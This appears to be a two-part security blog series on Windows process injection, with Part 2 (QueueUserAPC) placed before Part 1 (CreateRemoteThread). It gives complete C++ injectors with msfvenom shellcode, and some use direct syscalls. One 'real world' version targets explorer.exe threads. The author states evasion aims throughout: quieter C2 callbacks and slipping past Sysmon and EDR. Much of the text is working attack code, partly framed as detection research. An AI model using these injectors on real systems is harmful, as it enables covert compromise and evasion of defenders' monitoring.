To analyze API calls, I am using API Monitor with the following filters: [Data Access and Storage, NT Native, System Services].

Item	Count
Number of API Calls	199
Total Amount of Memory Used	127 KB

QueueUserAPC() Process Injection - Medium Level API Analysis

The total number of API calls was 199, which is noticeably larger than the High Level API’s 174 calls. That’s pretty noisy, but not unexpected considering the total number of functions that we needed to map from ntdll.dll and kernel32.dll. This creates a lot of events that would not be necessary if we mapped the functions within a custom implementation, which is what we are going to do within the Low Level API.

One thing that I would find very interesting is to analyze legitimate uses of QueueUserAPC and determine whether the sample above can easily be classified as malicious based on call activity alone.

Overall, though, we did decrease the High Level API calls regarding the injection itself, which is a step in the right direction.

Sysmon Analysis

As expected, Sysmon did not report any indication of process injection. Similar to the High Level code, we were able to distinguish which processes were accessed, with details containing the Call Trace. Again, this could be very helpful to an RE or triage analyst who is responding to a possible compromise.

Low Level API

#include <iostream>
#include <Windows.h>
#include "common.h"


int main()
{
    // msfvenom -p windows/x64/exec CMD=notepad.exe -f c
    unsigned char shellcode[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
        "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
        "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
        "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
        "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
        "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
        "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
        "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
        "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
        "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
        "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
        "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
        "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
        "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
        "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
        "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x6e\x6f\x74"
        "\x65\x70\x61\x64\x2e\x65\x78\x65\x00";

    // Create a 64-bit process: 
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    LPVOID allocation_start;
    SIZE_T allocation_size = sizeof(shellcode);
    LPCWSTR cmd;
    HANDLE hProcess, hThread;
    NTSTATUS status;

    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(si);
    cmd = TEXT("C:\\Windows\\System32\\nslookup.exe");

    if (!CreateProcess(
        cmd,							// Executable
        NULL,							// Command line
        NULL,							// Process handle not inheritable
        NULL,							// Thread handle not inheritable
        FALSE,							// Set handle inheritance to FALSE 
        CREATE_SUSPENDED |              // Create Suspended for APC Injection
        CREATE_NO_WINDOW,	            // Do Not Open a Window
        NULL,							// Use parent's environment block
        NULL,							// Use parent's starting directory 
        &si,			                // Pointer to STARTUPINFO structure
        &pi								// Pointer to PROCESS_INFORMATION structure
    )) {
        DWORD errval = GetLastError();
        std::cout << "FAILED" << errval << std::endl;
    }
    WaitForSingleObject(pi.hProcess, 1000); // Allow nslookup 1 second to start/initialize. 
    hProcess = pi.hProcess;
    hThread = pi.hThread;

    // LOW LEVEL API:
    allocation_start = nullptr;
    NtAllocateVirtualMemory(pi.hProcess, &allocation_start, 0, (PULONG)&allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    NtWriteVirtualMemory(pi.hProcess, allocation_start, shellcode, sizeof(shellcode), 0);
    NtQueueApcThread(hThread, (PKNORMAL_ROUTINE)allocation_start, allocation_start, NULL, NULL);
    NtResumeThread(hThread, NULL);  
    
}

API Call Analysis

To analyze API calls, I am using API Monitor with the following filters: [Data Access and Storage, NT Native, System Services].

Item	Count
Total Number of Calls	165
Total Amount of Memory Used	112 KB

QueueUserAPC() Process Injection - Low Level API Analysis

We have a very low number of calls overall, which makes us much quieter. To top it off, the only call we see is WaitForSingleObject(), which runs right after CreateProcess() in order to let nslookup.exe initialize. We do not see any of our process injection calls within API Monitor. It stands to reason, then, that AV / EDR systems would have a very difficult time hooking not only direct syscalls but also a process injection technique that Sysmon does not detect (that does not mean other systems can’t detect it; they can).

Sysmon Analysis

The Sysmon output matches the High and Medium level analysis. Honestly, I just put the image here for continuity’s sake.

Real World Scenario

Let’s take a second and look at a real-world example using this process injection technique. The reason for this section is to analyze the reliability of QueueUserAPC() injection and detail ways to make it more consistent. The code sample below uses the SysWhispers direct syscall methodology, just like the Low Level API example above. You will notice several differences within this source, however. The first is that we are not creating a process; we are in fact looking for explorer.exe, obtaining a handle to the process, enumerating the process’s threads, and injecting into five (5) of those threads.

#include <iostream>
#include <Windows.h>
#include <TlHelp32.h>
#include <vector>
#include "common.h"


int main()
{
    // msfvenom -p windows/x64/exec CMD=notepad.exe -f c
    unsigned char shellcode[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
        "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
        "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
        "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
        "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
        "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
        "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
        "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
        "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
        "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
        "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
        "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
        "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
        "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
        "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
        "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x6e\x6f\x74"
        "\x65\x70\x61\x64\x2e\x65\x78\x65\x00";

    /* Objects to enumerate an external Process: */
    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, 0);
    PROCESSENTRY32 processEntry = { sizeof(PROCESSENTRY32) };
    DWORD dwProcessId;


    /* Objects for Process Injection: */
    LPVOID allocation_start;
    SIZE_T allocation_size = sizeof(shellcode);
    HANDLE hThread;
    HANDLE hProcess;


    /* Find an explorer.exe process and save PID: */
    if (Process32First(snapshot, &processEntry)) {
        while (_wcsicmp(processEntry.szExeFile, L"explorer.exe") != 0) {
            Process32Next(snapshot, &processEntry);
        }
    }
    dwProcessId = processEntry.th32ProcessID;
    std::cout << "Process ID: " << dwProcessId << std::endl;

    /* Open the Process, allocate memory, write shellcode */
	OBJECT_ATTRIBUTES pObjectAttributes;
	InitializeObjectAttributes(&pObjectAttributes, NULL, NULL, NULL, NULL);

    CLIENT_ID pClientId;
    pClientId.UniqueProcess = (PVOID)processEntry.th32ProcessID;
    pClientId.UniqueThread = (PVOID)0;

    allocation_start = nullptr;
    NtOpenProcess(&hProcess, MAXIMUM_ALLOWED, &pObjectAttributes, &pClientId);
    NtAllocateVirtualMemory(hProcess, &allocation_start, 0, (PULONG)&allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    NtWriteVirtualMemory(hProcess, allocation_start, shellcode, sizeof(shellcode), 0);
  

    /* Enumerate all the threads associated with explorer.exe and save to vector */
    THREADENTRY32 threadEntry = { sizeof(THREADENTRY32) };
    std::vector<DWORD> threadIds;
    if (Thread32First(snapshot, &threadEntry)) {
        do {
            if (threadEntry.th32OwnerProcessID == processEntry.th32ProcessID) {
                threadIds.push_back(threadEntry.th32ThreadID);
            }
        } while (Thread32Next(snapshot, &threadEntry));
    }
    std::cout << "Total Threads Found: " << threadIds.size() << std::endl;


    /* For each thread associated with explorer.exe, open the thread and assign it
    *  the APC to execute our shellcode: */
    int count = 0;  
    for (DWORD threadId : threadIds) {
        std::cout << "Injecting into Thread: " << threadId << std::endl;

        OBJECT_ATTRIBUTES tObjectAttributes;
        InitializeObjectAttributes(&tObjectAttributes, NULL, NULL, NULL, NULL);

        CLIENT_ID tClientId;
        tClientId.UniqueProcess = (PVOID)dwProcessId;
        tClientId.UniqueThread = (PVOID)threadId;

        NtOpenThread(&hThread, MAXIMUM_ALLOWED, &tObjectAttributes, &tClientId);
        NtSuspendThread(hThread, NULL);
        NtQueueApcThread(hThread, (PKNORMAL_ROUTINE)allocation_start, allocation_start, NULL, NULL);
        NtResumeThread(hThread, NULL);
        count++;

        // Limit Injection to 5 threads.
        if (count == 5) {
            break;
        }
    }
}

When utilizing this form of process injection, it’s necessary to inject into 3-5 threads for reliability. That’s the first reason we hard code a five (5) thread injection limit. The second reason is that we don’t want 20-50 threads to execute our shellcode and produce 20-50 remote callbacks to our C2. That’s just way too loud! For example, we are injecting into explorer.exe, which is always going to be running. At any time, that process is going to have 20-50 threads running, so we limit our impact by only using 5.

The thread limit could actually be avoided via a check for C2 traffic and a Mutex, but I’m not going to detail that here.

QueueUserAPC() Process Injection - Real World Example Analysis

Once we execute the binary, we can see that the program found 35 threads associated with explorer.exe, and we injected into five (5) of those threads. We only received three (3) notepad.exe instances meaning that of the five (5) threads, only three (3) of those threads successfully executed our shellcode. In my experience, only 60%-70% of the injected threads successfully execute and it’s extremely variable with limited consistency.

The other issue I see often is that we crash the application we inject into. This is the case with several forms of process injection, but with QueueUserAPC() there is a very high probability of crashing explorer.exe, considering the example above. As a matter of fact, we do crash explorer.exe during our injection.

QueueUserAPC() Process Injection - Real World Example Sysmon Analysis

This example shows the variability and overall success probability that should be taken into account each time you use this technique. We don’t want to crash systems, and we don’t want to impact employees’ day-to-day operations, so choose the process carefully and limit the overall exposure.

Conclusion

The ability to execute our shellcode using direct syscalls rather than using Windows dependencies (Documented API, ntdll.dll, kernel32.dll) allows for a much quieter and more streamlined compromise. We were also able to circumvent common process injection detection via Sysmon by using QueueUserAPC() instead of CreateRemoteThread(). The image below details the QueueUserAPC Process Injection API calls that were observed via API Monitor.

QueueUserAPC() Process Injection - All API Analysis

QueueUserAPC() Vs. CreateRemoteThread()

Injection Type	API Level	Total API Calls	Total Memory Used
CreateRemoteThread()	High	298	192 KB
CreateRemoteThread()	Medium	309	196 KB
CreateRemoteThread()	Low	288	186 KB
QueueUserAPC()	High	174	116 KB
QueueUserAPC()	Medium	199	127 KB
QueueUserAPC()	Low	165	112 KB

It’s worth mentioning the differences in the two process injection techniques we’ve looked at so far. It’s apparent that CreateRemoteThread() is louder, easier to detect, and the most common API call for process injection. CreateRemoteThread() is also very reliable, whereas QueueUserAPC() can be a bit unpredictable if you’re opening an already instantiated process and injecting into one of its threads. However, generating a process and injecting into it seems to create a much higher probability of success, as seen in all the examples above.

It’s fairly obvious that if you want to be quieter / more stealthy, QueueUserAPC() has the advantage.

Process Injection Part 2 | QueueUserAPC()
Joshua

Process Injection Part 1 | CreateRemoteThread()

Sevro Security

Joshua

8 April 2020 at 19:17


In this new series, I am going to dive deep into Windows Process Injection. The purpose of this series is to dig into how each injection technique works at its core. Each post is going to be broken down into four (4) parts:

Process Injection Primer – Subject to the injection technique, we will review how this type of injection works programmatically.
Analyze High Level Windows API Calls – Use the MSDN Documented methods and functions.
1. API Call Analysis
2. Sysmon events and logging
Analyze Medium Level Windows Syscalls Using LoadLibrary – Use the NTAPI Undocumented functions via ntdll.dll
1. API Call Analysis
2. Sysmon events and logging
Analyze Low Level Windows Syscalls Using x86 Assembly – Custom via Rolling Our Own Syscalls
1. API Call Analysis
2. Sysmon events and logging

I am piggybacking off the phenomenal research conducted by Outflank as well as a project developed by @Jackson_T called SysWhispers that auto-generates x86 ASM functions and header files. Incredible work, to say the least.

Each post in this series will contain source code that is written in C++ with both High Level API calls and corresponding Low Level Syscalls. For continuity, I am going to be compiling all my builds for the x64 architecture.

Reference Material

For high-level Windows API calls, we will use the official Microsoft MSDN Documentation. For all the undocumented functions, which is what we will be using when we want to conduct direct system calls, we will reference the NTAPI Undocumented Functions. If you’re unfamiliar with syscalls and the Windows APIs, I will provide a small Process Injection primer; however, I am not detailing how Windows User vs. Kernel mode works and the associated rings. I highly suggest you read Outflank’s blog post in order to understand more.

Code Examples:

All code examples use the same 64-bit shellcode generated with the Metasploit Framework’s msfvenom tool.
- msfvenom -p windows/x64/exec CMD=notepad.exe -f c
- The shellcode executes Notepad.exe.

System Configuration / Tools:

Sysmon installed with SwiftOnSecurity’s configuration.
API Monitor to analyze all function calls.
I generated the common.asm and common.h files using the SysWhispers repository and followed the repository’s directions on how to add the files to an existing Visual Studio C++ project.
- python syswhispers.py -p common -o common

Process Injection Primer

With regard to CreateRemoteThread() process injection, there are really three (3) main objectives that need to be met:

VirtualAllocEx() – Be able to access an external process in order to allocate memory within its virtual address space.
WriteProcessMemory() – Write shellcode to the allocated memory.
CreateRemoteThread() – Have the external process execute said shellcode within another thread.

Example

LPVOID allocation_start;
allocation_start = VirtualAllocEx(pi.hProcess, NULL, allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, allocation_start, shellcode, allocation_size, NULL);
CreateRemoteThread(pi.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)allocation_start, NULL, 0, 0);

VirtualAllocEx()

We first need to allocate a chunk of memory that is the same size as our shellcode. VirtualAllocEx is the Windows API we need to call in order to initialize a buffer space that resides in a region of memory within the virtual address space of a specified process (i.e., the process we want to inject into).

VirtualAllocEx – Reserves, Commits, or Changes the state of memory within a specified process. This API call takes an additional parameter, compared to VirtualAlloc, (HANDLE hProcess) which is a Handle to the victim process.

LPVOID VirtualAllocEx(
  HANDLE hProcess,
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flAllocationType,
  DWORD  flProtect
);

Looking at the example above, we have a HANDLE to an external process (nslookup.exe in this case). With this handle, we can allocate a buffer the same size as our shellcode within the victim process’s virtual memory pages.

The image above is a snapshot of a Visual Studio Debugging session. I set a break point at the VirtualAllocEx CALL and then stepped over it in order to execute it. We can see that VirtualAllocEx() allocated a buffer located at 0x000001efdc9d000. This memory allocation should be within the nslookup.exe process space. To confirm, we can open the nslookup.exe process in ProcessHacker → Properties → Memory and look for the memory region we see in the debugger.

WriteProcessMemory()

Now that we have allocated a buffer the same size as our shellcode, we can write our shellcode into that buffer.

WriteProcessMemory() – Writes data to an area of memory in a specified process.

BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesWritten
);

In the Visual Studio Debugger, I step forward once again, which executes the WriteProcessMemory CALL. This writes the contents of our shellcode into the victim process’s allocated memory space. In ProcessHacker, we can conduct a memory dump of nslookup.exe, and when we specifically analyze the memory we allocated via the VirtualAllocEx CALL, we can see that our shellcode was properly written to the nslookup.exe buffer.

ProcessHacker.exe analysis of WriteProcessMemory

CreateRemoteThread()

With the shellcode loaded into the allocated virtual memory space of the victim process, we can now tell the victim process to create a new thread starting at the address of our shellcode buffer.

CreateRemoteThread() – Creates a thread that runs in the virtual address space of another process.

HANDLE CreateRemoteThread(
  HANDLE                 hProcess,
  LPSECURITY_ATTRIBUTES  lpThreadAttributes,
  SIZE_T                 dwStackSize,
  LPTHREAD_START_ROUTINE lpStartAddress,
  LPVOID                 lpParameter,
  DWORD                  dwCreationFlags,
  LPDWORD                lpThreadId
);

Stepping forward for the last time, we execute CreateRemoteThread and get a Notepad.exe instance.

Final Process Injection executing Notepad.exe

High Level Windows API

In the example below, I create a 64-bit Nslookup.exe process and then inject into it using default Metasploit shellcode that simply creates an instance of Notepad.exe. This is not a very “clean” method of injection but for the purpose of this example, it works. This example details the proper / MSDN documented method of executing code within a different process space.

#include <iostream>
#include <Windows.h>
#include "common.h"

int main()
{
    // msfvenom -p windows/x64/exec CMD=notepad.exe -f c
    unsigned char shellcode[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
        "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
        "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
        "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
        "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
        "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
        "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
        "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
        "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
        "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
        "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
        "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
        "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
        "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
        "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
        "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x6e\x6f\x74"
        "\x65\x70\x61\x64\x2e\x65\x78\x65\x00";

    // Create a 64-bit process: 
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    LPVOID allocation_start;
    SIZE_T allocation_size = sizeof(shellcode);
    LPCWSTR cmd;
    HANDLE hProcess, hThread;
    
    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(si);
    cmd = TEXT("C:\\Windows\\System32\\nslookup.exe");

    if (!CreateProcess(
        cmd,							// Executable
        NULL,							// Command line
        NULL,							// Process handle not inheritable
        NULL,							// Thread handle not inheritable
        FALSE,							// Set handle inheritance to FALSE
        CREATE_NO_WINDOW,	            // Do Not Open a Window
        NULL,							// Use parent's environment block
        NULL,							// Use parent's starting directory 
        &si,			                // Pointer to STARTUPINFO structure
        &pi								// Pointer to PROCESS_INFORMATION structure
    )) {
        DWORD errval = GetLastError();
        std::cout << "FAILED" << errval << std::endl;
    }
    WaitForSingleObject(pi.hProcess, 1000); // Allow nslookup 1 second to start/initialize. 

    // Inject into the 64-bit process:
    // HIGH-LEVEL WINDOWS API:
    allocation_start = VirtualAllocEx(pi.hProcess, NULL, allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(pi.hProcess, allocation_start, shellcode, allocation_size, NULL);
    CreateRemoteThread(pi.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)allocation_start, NULL, 0, 0);
}

API Call Analysis

To analyze API calls, I am using API Monitor with the following filters: [Data Access and Storage, NT Native, System Services, Undocumented].

Item	Count
Number of API Calls	298
Total Amount of Memory Used	192 KB

API Monitor Analysis of High-Level API calls

Basic analysis of the API calls makes it very clear that the program is accessing and manipulating the memory of an external process. When we narrow in and only look at CRT_High_Level_API.exe and KERNELBASE.DLL, we see each and every function call. The great part of API Monitor is that we can also analyze the decoded function parameters and the memory page at the time of the instruction/CALL.

As a mental note, look at the image above and compare each CRT_High_Level_API.exe function call (High Level API) with the lower-level API functions the OS calls. There is a distinct difference here, and it’s one worth noting, as we will call those functions directly when we look at the Low-Level API calls.

Sysmon Analysis

Sysmon detected five (5) distinct events related to CRT_High_Level_API.exe:

Process Create – CRT_High_Level_API.exe
Process Create – nslookup.exe
CreateRemoteThread – Process Injection into nslookup.exe
Process Terminated – CRT_High_Level_API.exe exit
Process Create – nslookup.exe executes shellcode which opens notepad.exe

For all testing, these events are going to be the same, considering how the Sysmon driver hooks syscalls. This is a great tool for the Blue Team because, no matter how low we go, Sysmon “should” be able to catch our CreateRemoteThread() process injection. But with a claim like that, let’s look at why Sysmon is so damn powerful.

Sysmon’s Power

Procmon Analysis of High-Level API execution in User-Land and Kernel-Land

The image above depicts the User-Land vs. Kernel-Land. In the example above, we executed the ntdll.dll!NtQueryVirtualMemory function and that set a chain of events that eventually ended up in Kernel-Land issuing a syscall. Many AV / EDR solutions run in User-Land and do not (can’t) touch Kernel-Land. That’s why later in this post, we are going to circumvent running to Kernel-Land to execute a syscall and just do it ourselves. But, Sysmon is different in that a driver is loaded (SysmonDrv.sys) that will still hook and enumerate the syscall regardless of where the instruction is executed.

Medium Level API – Ntdll.dll

We have set up a program that moves away from using the High-Level API and directly calls the undocumented functions that are resident within ntdll.dll. You’ll notice that we now have a series of new structs and custom types that are necessary in order to load the required functions and execute them properly.

The goal of this code is to mitigate the High-Level function calls that the OS then translates to several Lower-Level API calls by simply calling the lower-level API ourselves.

#include <iostream>
#include <Windows.h>

typedef struct _UNICODE_STRING
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

typedef struct _PS_ATTRIBUTE
{
    ULONG  Attribute;
    SIZE_T Size;
    union
    {
        ULONG Value;
        PVOID ValuePtr;
    } u1;
    PSIZE_T ReturnLength;
} PS_ATTRIBUTE, * PPS_ATTRIBUTE;

typedef struct _PS_ATTRIBUTE_LIST
{
    SIZE_T       TotalLength;
    PS_ATTRIBUTE Attributes[1];
} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;

typedef struct _OBJECT_ATTRIBUTES
{
    ULONG           Length;
    HANDLE          RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG           Attributes;
    PVOID           SecurityDescriptor;
    PVOID           SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;


typedef NTSTATUS(WINAPI* NAVM)(HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG);
typedef NTSTATUS(NTAPI* NWVM)(HANDLE, PVOID, PVOID, ULONG, PULONG);
typedef NTSTATUS(NTAPI* NCT)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, SIZE_T, SIZE_T, SIZE_T, PPS_ATTRIBUTE_LIST);


int main()
{
    // msfvenom -p windows/x64/exec CMD=notepad.exe -f c
    unsigned char shellcode[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
        "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
        "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
        "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
        "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
        "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
        "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
        "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
        "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
        "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
        "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
        "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
        "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
        "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
        "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
        "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x6e\x6f\x74"
        "\x65\x70\x61\x64\x2e\x65\x78\x65\x00";


    // Create a 64-bit process: 
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    LPVOID allocation_start;
    SIZE_T allocation_size = sizeof(shellcode);
    LPCWSTR cmd;
    HANDLE hProcess, hThread;
    NTSTATUS status;
    
    ZeroMemory(&si, sizeof(si));
    ZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(si);
    cmd = TEXT("C:\\Windows\\System32\\nslookup.exe");

    if (!CreateProcess(
        cmd,							// Executable
        NULL,							// Command line
        NULL,							// Process handle not inheritable
        NULL,							// Thread handle not inheritable
        FALSE,							// Set handle inheritance to FALSE
        CREATE_NO_WINDOW,	            // Do Not Open a Window
        NULL,							// Use parent's environment block
        NULL,							// Use parent's starting directory 
        &si,			                // Pointer to STARTUPINFO structure
        &pi								// Pointer to PROCESS_INFORMATION structure
    )) {
        DWORD errval = GetLastError();
        std::cout << "FAILED" << errval << std::endl;
    }
    WaitForSingleObject(pi.hProcess, 1000); // Allow nslookup 1 second to start/initialize. 


    // Inject into the 64-bit process:
    // LoadLibrary MEDIUM-LEVEL UNDOCUMENTED API:
    HINSTANCE hNtdll = LoadLibrary(L"ntdll.dll");
    NAVM NtAllocateVirtualMemory = (NAVM)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
    NWVM NtWriteVirtualMemory = (NWVM)GetProcAddress(hNtdll, "NtWriteVirtualMemory");
    NCT NtCreateThreadEx = (NCT)GetProcAddress(hNtdll, "NtCreateThreadEx");
    allocation_start = nullptr;

    status = NtAllocateVirtualMemory(pi.hProcess, &allocation_start, 0, (PULONG)&allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    status = NtWriteVirtualMemory(pi.hProcess, allocation_start, shellcode, sizeof(shellcode), 0);
    status = NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, pi.hProcess, allocation_start, allocation_start, FALSE, NULL, NULL, NULL, NULL);
}

API Call Analysis

To analyze API calls, I am using API Monitor with the following filters: [Data Access and Storage, NT Native, System Services].

Item	Count
Number of API Calls	309
Total Amount of Memory Used	196 KB

There was an uptick in overall API Calls and size of memory used (not a big deal). But, we successfully bypassed using the High-Level API to execute shellcode. When we look at the actual API Calls (in the image below), we can see a distinct difference. All the API calls were called via the executable rather than being passed to KERNELBASE.dll. This is because we loaded ntdll.dll and then dynamically loaded the functions we needed in order to inject into nslookup.exe.

API Monitor Analysis of Medium-Level API calls

Sysmon Analysis

Sysmon caught all the same events as the High-Level API calls. This is to be expected since the driver has the capability to hook events subject to the configuration.

To get a better idea as to where Sysmon was hooking our syscalls, we can review the process stack right before shellcode execution in nslookup.exe to see if the SysmonDrv.sys driver was loaded. And that’s exactly what we see. Procmon is a bit limited as to the overall functions we can see within the stack trace (regardless of proper symbol loading) but we can easily discern our own event timeline subject to the Process Create, Process Start, and Thread Create operations.

Procmon.exe Analysis of Medium-Level API calls

Reviewing the image above shows that right when nslookup.exe was executing the shellcode in a new thread, Sysmon observed an event that the Sysmon configuration file says we are interested in, so it hooked and analyzed it.

Low Level API – Direct Syscalls

